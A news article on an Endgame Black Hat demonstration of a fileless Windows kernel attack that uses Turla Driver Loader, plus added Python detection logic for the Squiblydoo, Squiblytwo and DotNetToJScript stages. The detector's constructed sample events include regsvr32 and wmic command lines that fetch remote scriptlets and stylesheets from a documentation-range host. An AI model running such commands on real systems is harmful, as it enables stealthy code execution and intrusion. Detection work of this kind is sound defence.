August 10, 2018 (updated 13 Aug 2018 12:17pm)

Kernel Attack Fully Compromises Windows Machines

Turla Driver Loader is able to bypass Microsoft Windows protections in order to exploit the kernel.

By CBR Staff Writer

Researchers have demonstrated a new attack method able to compromise the kernel in Windows machines.

On Thursday at the Black Hat conference in Las Vegas, researchers from cybersecurity firm Endgame demonstrated how kernel attacks can go beyond standard malware and exploits to fully compromise a Windows machine with a fileless technique.

As reported by Threat Post, during the session “Kernel Mode Threats and Practical Defenses,” senior Endgame researcher Joe Desimone demonstrated how the Turla Driver Loader could be crafted into a full, fileless kernel-mode attack.

The Turla Driver Loader (TDL), available on GitHub, is a driver loader designed to bypass Windows x64 Driver Signature Enforcement protections.

The security measure is intended to stop unsigned drivers from loading, but according to the developers of TDL it “ruined many freeware programs” and “didn’t fix anything in the anti-malware field,” which led them to develop the bypass.

Kernel

The kernel is the central module of an operating system. It is loaded at boot, stays resident in memory for the lifetime of the machine, and mediates every process, thread, device and memory access on the system.

A threat actor who gains code execution in the kernel runs with higher privilege than any user-mode process, including security software: they can read and modify any part of the OS, hide their own artefacts, and perform actions that would otherwise be forbidden.

As a result operating system vendors, Microsoft included, spend a vast amount of resources protecting the kernel.

The Redmond giant has a number of protections in place: Kernel Patch Protection (KPP, also known as PatchGuard), which detects unauthorised modification of kernel code and critical kernel data structures on 64-bit Windows and crashes the system when it finds one; Driver Signature Enforcement (DSE), which refuses to load a driver that is not signed with a trusted code-signing certificate; and Secure Boot, which has the UEFI firmware boot only components signed by a key it trusts, normally Microsoft’s and the Original Equipment Manufacturer’s (OEM’s).

However, cyberattackers are constantly seeking new ways to compromise the kernel through malware and new attack techniques.

TDL was not crafted as a tool for threat actors, and yet, the public code can be used for a full compromise of Windows systems and the exfiltration of data.

Endgame researchers demonstrated how TDL can be used as the final stage of an exploit chain. The living-off-the-land techniques Squiblydoo and Squiblytwo (which abuse the signed Windows binaries regsvr32.exe and wmic.exe to run remotely hosted scriptlets) and DotNetToJScript (which loads a .NET assembly from JScript or VBScript) are combined to execute arbitrary .NET code that maps TDL into memory without ever writing it to disk, so neither Windows protections nor antivirus software is triggered.

Once in memory, TDL loads a legitimately signed driver that contains a vulnerability, exploits that vulnerability to gain kernel-mode execution, and uses it to map arbitrary unsigned code into the kernel. Driver Signature Enforcement is never violated: the only driver that goes through the signature check is the signed, vulnerable one.
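The user-mode stages of this chain leave traces that defenders can match on. The following detection logic is an added example, not code from Endgame or from the TDL project: it runs over constructed Sysmon-style process-creation (event 1) and image-load (event 7) records and flags Squiblydoo (regsvr32 registering scrobj.dll with a scriptlet), Squiblytwo (wmic rendering through a remote or on-disk XSL stylesheet) and DotNetToJScript (a script host that should never need .NET loading the CLR). The field names, the `Event` class, the host and CLR image lists and the sample events are all assumptions made for this example.

```python
# Added example (not Endgame's or TDL's code): detection logic for the
# living-off-the-land stages of the chain above, run over CONSTRUCTED
# Sysmon-style events. Field names (event_id, image, command_line,
# image_loaded) are assumptions modelled on Sysmon event IDs 1 and 7.
import re
from dataclasses import dataclass

# Script/COM hosts that have no business loading the .NET runtime;
# a CLR load inside one of them is the DotNetToJScript signature.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe",
                "regsvr32.exe", "wmic.exe", "rundll32.exe"}
CLR_IMAGES = {"mscoree.dll", "clr.dll", "clrjit.dll", "mscorlib.ni.dll"}

# Squiblydoo: regsvr32 with /i: pointing at a remote URL or a .sct scriptlet.
SQUIBLYDOO = re.compile(r"/i:\S*?(https?://|\.sct\b)")
# Squiblytwo: wmic /format: with a remote URL or an XSL stylesheet.
SQUIBLYTWO = re.compile(r"/format:\s*[\"']?(https?://|\S*?\.xsl\b)")


@dataclass
class Event:
    event_id: int            # 1 = process creation, 7 = image load
    image: str               # path of the process image
    command_line: str = ""   # event 1 only
    image_loaded: str = ""   # event 7 only


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(ev: Event) -> list:
    """Names of the chain stages this single event matches (possibly empty)."""
    hits = []
    name = basename(ev.image)
    cmd = ev.command_line.lower()
    if ev.event_id == 1:
        if name == "regsvr32.exe" and "scrobj.dll" in cmd and SQUIBLYDOO.search(cmd):
            hits.append("squiblydoo")
        if name == "wmic.exe" and SQUIBLYTWO.search(cmd):
            hits.append("squiblytwo")
    elif ev.event_id == 7:
        if name in SCRIPT_HOSTS and basename(ev.image_loaded) in CLR_IMAGES:
            hits.append("dotnettojscript")
    return hits


def scan(events) -> dict:
    """Map each matching process image name to the set of stages seen."""
    findings = {}
    for ev in events:
        for hit in detect(ev):
            findings.setdefault(basename(ev.image), set()).add(hit)
    return findings


# Constructed sample telemetry (192.0.2.0/24 is a documentation-only range).
SAMPLE_EVENTS = [
    Event(1, r"C:\Windows\System32\regsvr32.exe",
          command_line=r"regsvr32 /s /n /u /i:http://192.0.2.10/stage1.sct scrobj.dll"),
    Event(1, r"C:\Windows\System32\wbem\wmic.exe",
          command_line=r'wmic os get /format:"http://192.0.2.10/stage2.xsl"'),
    Event(7, r"C:\Windows\System32\wscript.exe",
          image_loaded=r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"),
    # Benign look-alikes that must not fire:
    Event(1, r"C:\Windows\System32\regsvr32.exe",
          command_line=r'regsvr32 /s "C:\Program Files\Vendor\comsrv.dll"'),
    Event(1, r"C:\Windows\System32\wbem\wmic.exe",
          command_line=r"wmic os get caption /format:list"),
    Event(7, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          image_loaded=r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"),
]

if __name__ == "__main__":
    for image, stages in scan(SAMPLE_EVENTS).items():
        print(f"{image}: {', '.join(sorted(stages))}")
```

Command-line matching is deliberately narrow (scrobj.dll plus a scriptlet for regsvr32, a URL or .xsl for wmic) so that routine COM registration and `wmic ... /format:list` do not fire; attackers can still rename or obfuscate arguments, which is why the CLR-load rule, which does not depend on the command line, is the more robust of the three. None of this sees the TDL stage itself: the legitimately signed vulnerable driver only shows up as a driver-load event (Sysmon event 6), and the unsigned code it maps afterwards needs kernel-level telemetry to observe.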

The researchers say they do not know of any other teams which have created the same exploit chain for kernel compromise.

Speaking to Threat Post, Endgame researcher Gabriel Landau said: “We’re able to get full access on the machines in a very stealthy way.”

Microsoft’s newer answer to such attacks is Virtualization Based Security (VBS), which uses the Hyper-V hypervisor to isolate security-critical code from the rest of the kernel and, with Hypervisor-protected Code Integrity (HVCI), to enforce that only signed code runs in kernel mode. Even this protection isn’t enough: Endgame was also able to circumvent VBS and silently disable antivirus solutions.

At the same time as Endgame was demonstrating how to compromise critical aspects of Windows systems, Microsoft was urging bug bounty hunters to turn their attention to Hyper-V.
